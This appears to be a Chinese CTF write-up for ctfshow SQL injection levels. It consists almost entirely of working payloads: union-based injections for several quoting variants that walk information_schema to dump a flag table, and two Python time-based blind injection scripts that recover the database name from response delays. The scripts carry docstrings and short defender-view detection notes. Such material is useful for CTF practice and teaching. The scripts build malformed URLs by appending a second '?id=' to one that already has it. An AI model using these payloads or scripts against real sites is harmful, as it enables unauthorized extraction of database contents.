?id=1 显示正常
?id=1' 报错
?id=1' --+ 显示正常
基于错误的GET单引号字符型注入
?id=1' order by 3 --+
?id=0' union select 1,2,3 --+
?id=0' union select 1,2,database() --+ //当前库
?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata --+ //所有库
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag' --+
?id=0' union select 1,2,group_concat(flag) from ctfshow.flag --+
?id=1 显示正常
?id=1' 报错
?id=1' --+ 报错
?id=1 --+ 显示正常
基于错误的GET整型注入
?id=1 order by 3 --+
?id=0 union select 1,2,3 --+
?id=0 union select 1,2,database() --+
?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+
?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagaa' --+
?id=0 union select 1,2,group_concat(flagac) from ctfshow.flagaa--+
?id=1 显示正常
?id=1' 报错
?id=1' --+ 报错
?id=1') --+ 显示正常
基于错误的GET单引号变形字符型注入
?id=1') order by 3 --+
?id=0') union select 1,2,3 --+
?id=0') union select 1,2,database() --+ //当前库
?id=0') union select 1,2,group_concat(schema_name) from information_schema.schemata --+ //所有库
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagaanec' --+
?id=0') union select 1,2,group_concat(flagaca) from ctfshow.flagaanec--+
基于错误的GET双引号字符型注入
?id=1") order by 3 --+
?id=0") union select 1,2,3 --+
?id=0") union select 1,2,database() --+ //当前库
?id=0") union select 1,2,group_concat(schema_name) from information_schema.schemata --+ //所有库
?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' --+
?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagsf' --+
?id=0") union select 1,2,group_concat(flag23) from ctfshow.flagsf--+
双注入GET单引号字符型注入
测试时,发现正常情况下只会显示You are in…
布尔盲注
?id=1' and sleep(5) --+
脚本:
1.获取数据库名长度
# coding:utf-8
import requests
import datetime
import time
def database_len() -> None:
    """Infer the length of the current database name from response timing.

    For each candidate length ``i`` in 1..9 one GET request is sent whose
    ``id`` parameter embeds ``if(length(database())>i, sleep(1), 0)``. The
    wall-clock duration of that request, in whole seconds, is the only
    oracle: a request that took at least 1 s is read as "length > i", and
    the loop stops at the first ``i`` for which it did not.

    Prints the candidate lengths as they are tested and the final value.
    Returns nothing; network errors from ``requests.get`` propagate.
    """
    # NOTE(review): the final print reads ``i`` after the loop, so it
    # reports the last value tested, not a separately stored result.
    for i in range(1, 10):
        # Challenge-instance URL taken verbatim from the write-up; the
        # payload string is appended to it with no separator.
        url = "http://22c5ef77-f9ec-4af9-98a5-d09243d65708.challenge.ctf.show/?id=1"
        payload = " ?id=1' and if(length(database())>%s,sleep(1),0) --+" % i
        # print(url+payload+'%23')
        # Timing oracle: only the elapsed seconds of the request matter.
        time1 = datetime.datetime.now()
        r = requests.get(url + payload)
        time2 = datetime.datetime.now()
        # ``timedelta.seconds`` truncates to whole seconds; sub-second
        # jitter is ignored, so the threshold is exactly the injected delay.
        sec = (time2 - time1).seconds
        if sec >= 1:
            print(i)
        else:
            print(i)
            break
    # Detection note (defender's view): this probe produces a burst of
    # requests to one endpoint whose query string carries ``sleep(`` /
    # ``if(`` and an unbalanced quote, with response times clustering at
    # the injected delay — the pattern access-log alerting and WAF rules
    # key on. The root fix on the server side is a parameterized query.
    print('database_len:', i)
if __name__ == '__main__':
    # Script entry point: run the length probe only when executed directly,
    # not when imported.
    database_len()
2.获取当前数据库名
# coding:utf-8
import requests
import datetime
import time
def database_name() -> None:
    """Recover the current database name one character at a time by timing.

    For each position ``j`` in 1..8 and each candidate character from
    ``0-9a-z``, one GET request is sent whose ``id`` parameter embeds
    ``if(substr(database(),j,1)='c', sleep(3), 1)``. A request that took
    at least 3 s (whole seconds) is read as a match: the character is
    appended to ``name`` and the inner loop moves on to the next position.

    If no candidate matches at a position (the charset has no uppercase,
    digits-only, or ``_``), nothing is appended and the next position is
    probed anyway. Prints the partial name after each hit and the final
    value; returns nothing. Network errors from ``requests.get`` propagate.
    """
    name: str = ''
    for j in range(1,9):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            # Challenge-instance URL taken verbatim from the write-up; the
            # payload string is appended to it with no separator.
            url = "http://22c5ef77-f9ec-4af9-98a5-d09243d65708.challenge.ctf.show/?id=1"
            payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (j,i)
            #print(url+payload)
            # Timing oracle: elapsed whole seconds of the request.
            time1 = datetime.datetime.now()
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >=3:
                name += i
                print(name)
                break
    # Detection note (defender's view): up to 8 * 36 near-identical requests
    # to one endpoint, each carrying ``substr(database()`` and ``sleep(``,
    # with a small fraction of them taking ~3 s — a strong signal for
    # rate-based and signature-based alerting. Parameterized queries remove
    # the injection point entirely.
    print('database_name:', name)
if __name__ == '__main__':
    # Script entry point: run the name probe only when executed directly,
    # not when imported.
    database_name()